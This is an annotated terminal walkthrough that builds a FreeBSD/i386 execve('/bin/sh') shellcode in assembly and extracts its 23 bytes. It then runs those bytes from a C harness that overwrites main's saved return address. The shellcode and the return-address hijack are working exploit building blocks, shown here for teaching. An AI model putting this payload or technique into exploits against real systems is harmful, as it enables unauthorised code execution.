
|=----------------------------=[ FreeBSD Shellcode ]=-------------------------=|
|=----------------------------------------------------------------------------=|

----[ Intro

(Ultra-basic walkthrough, still a draft [fixme]: build a minimal FreeBSD/i386 execve("/bin/sh") shellcode in GNU as, check its bytes with objdump, then run those bytes from a small C test harness.)

[lhall@redcell ~]$ uname -a
FreeBSD redcell 6.2-RELEASE-p7 FreeBSD 6.2-RELEASE-p7 #0: Sun Aug  5 14:38:45 EDT 2007     
lhall@:/usr/obj/usr/src/sys/REDCELL  i386

[lhall@redcell ~]$

[lhall@redcell ~]$ cat > fbsdshell.s << EOF
> .section .text
> .globl _start
> _start:
>    # execve("/bin//sh", argv, envp) using the FreeBSD i386 syscall convention:
>    # arguments are pushed right-to-left on the stack, then a throwaway
>    # return-address slot, and the syscall number goes in %eax before int \$0x80.
>    xorl  %eax, %eax  # eax = 0 without encoding a NUL byte; reused as NUL/NULL below
>    pushl %eax        # NUL terminator for the pathname
>    pushl \$0x68732f2f # "//sh" (doubled '/' pads the path to 8 bytes, no NUL needed)
>    pushl \$0x6e69622f # "/bin" -> stack now holds "/bin//sh\0"
>    movl  %esp, %ecx  # ecx = address of the pathname
>    pushl %eax        # envp = NULL (3rd argument)
>    pushl %esp        # argv = address of the NULL just pushed, i.e. an empty argv[] (2nd argument)
>    pushl %ecx        # path = address of "/bin//sh" (1st argument)
>    mov   \$59, %al    # SYS_execve; writing only %al keeps the encoding NUL-free
>    pushl %eax        # dummy return-address slot the FreeBSD syscall ABI expects; value is irrelevant
>    int \$0x80
> EOF

[lhall@redcell ~]$ cat fbsdshell.s
.section .text
.globl _start
_start:
   # execve("/bin//sh", argv, envp) using the FreeBSD i386 syscall convention:
   # arguments are pushed right-to-left on the stack, then a throwaway
   # return-address slot, and the syscall number goes in %eax before int $0x80.
   xorl  %eax, %eax  # eax = 0 without encoding a NUL byte; reused as NUL/NULL below
   pushl %eax        # NUL terminator for the pathname
   pushl $0x68732f2f # "//sh" (doubled '/' pads the path to 8 bytes, no NUL needed)
   pushl $0x6e69622f # "/bin" -> stack now holds "/bin//sh\0"
   movl  %esp, %ecx  # ecx = address of the pathname
   pushl %eax        # envp = NULL (3rd argument)
   pushl %esp        # argv = address of the NULL just pushed, i.e. an empty argv[] (2nd argument)
   pushl %ecx        # path = address of "/bin//sh" (1st argument)
   mov   $59, %al    # SYS_execve; writing only %al keeps the encoding NUL-free
   pushl %eax        # dummy return-address slot the FreeBSD syscall ABI expects; value is irrelevant
   int $0x80

[lhall@redcell ~]$ as fbsdshell.s -o fbsdshell.o

[lhall@redcell ~]$ ld fbsdshell.o -o fbsdshell

[lhall@redcell ~]$ objdump -d fbsdshell

fbsdshell:     file format elf32-i386-freebsd

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0                   xor    %eax,%eax
 8048076:       50                      push   %eax
 8048077:       68 2f 2f 73 68          push   $0x68732f2f
 804807c:       68 2f 62 69 6e          push   $0x6e69622f
 8048081:       89 e1                   mov    %esp,%ecx
 8048083:       50                      push   %eax
 8048084:       54                      push   %esp
 8048085:       51                      push   %ecx
 8048086:       b0 3b                   mov    $0x3b,%al
 8048088:       50                      push   %eax
 8048089:       cd 80                   int    $0x80

[lhall@redcell ~]$ ./shellcode.py -b fbsdshell
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe1\x50\x54\x51\xb0\x3b\x50\xcd\x80"

[lhall@redcell ~]$ ./fbsdshell
$ exit

[lhall@redcell ~]$ cat > execme.c << EOF
> /* The 23 NUL-free execve("/bin//sh") bytes extracted above.  A file-scope
>  * char array lives in writable data; this harness relies on that mapping
>  * also being executable on the test system. */
> char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe1\x50\x54\x51\xb0\x3b\x50\xcd\x80";
>
> /* Classic return-address-overwrite harness: make main() "return" into sc.
>  * NOTE(review): assumes the frame layout [ret][saved %ebp][return address],
>  * i.e. the saved return address sits exactly two words above the local ret.
>  * That is undefined behaviour in C and only works for an unoptimized build
>  * without stack protection; a layout-independent alternative is
>  * ((void (*)(void))sc)();.  The (int) cast also assumes 32-bit pointers (i386).
>  * void main is non-standard (gcc warns below); int main(void) is portable. */
> void main(void) {
>    int *ret;
>    ret = (int *)&ret + 2;   /* point at main's saved return address */
>    (*ret) = (int)sc;        /* redirect it so main's ret lands in the shellcode */
>
> }
> EOF
[lhall@redcell ~]$

[lhall@redcell ~]$ cat execme.c
/* The 23 NUL-free execve("/bin//sh") bytes extracted above.  A file-scope
 * char array lives in writable data; this harness relies on that mapping
 * also being executable on the test system. */
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe1\x50\x54\x51\xb0\x3b\x50\xcd\x80";

/* Classic return-address-overwrite harness: make main() "return" into sc.
 * NOTE(review): assumes the frame layout [ret][saved %ebp][return address],
 * i.e. the saved return address sits exactly two words above the local ret.
 * That is undefined behaviour in C and only works for an unoptimized build
 * without stack protection; a layout-independent alternative is
 * ((void (*)(void))sc)();.  The (int) cast also assumes 32-bit pointers (i386).
 * void main is non-standard (gcc warns below); int main(void) is portable. */
void main(void) {
   int *ret;
   ret = (int *)&ret + 2;   /* point at main's saved return address */
   (*ret) = (int)sc;        /* redirect it so main's ret lands in the shellcode */

}
[lhall@redcell ~]$ gcc execme.c
execme.c: In function `main':
execme.c:3: warning: return type of 'main' is not `int'

[lhall@redcell ~]$ ./a.out
$
$ exit